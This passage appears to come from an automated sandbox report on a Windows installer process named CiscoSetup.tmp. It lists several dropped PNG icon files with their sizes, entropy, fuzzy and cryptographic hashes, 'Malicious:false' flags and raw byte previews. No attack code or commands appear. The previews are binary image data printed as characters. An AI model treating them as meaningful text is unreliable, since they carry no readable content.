                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                                                                                  MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                                                                                  SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                                                                                  SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                                                                                  SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                                                                                  MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                                                                                  SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                                                                                  SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                                                                                  SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
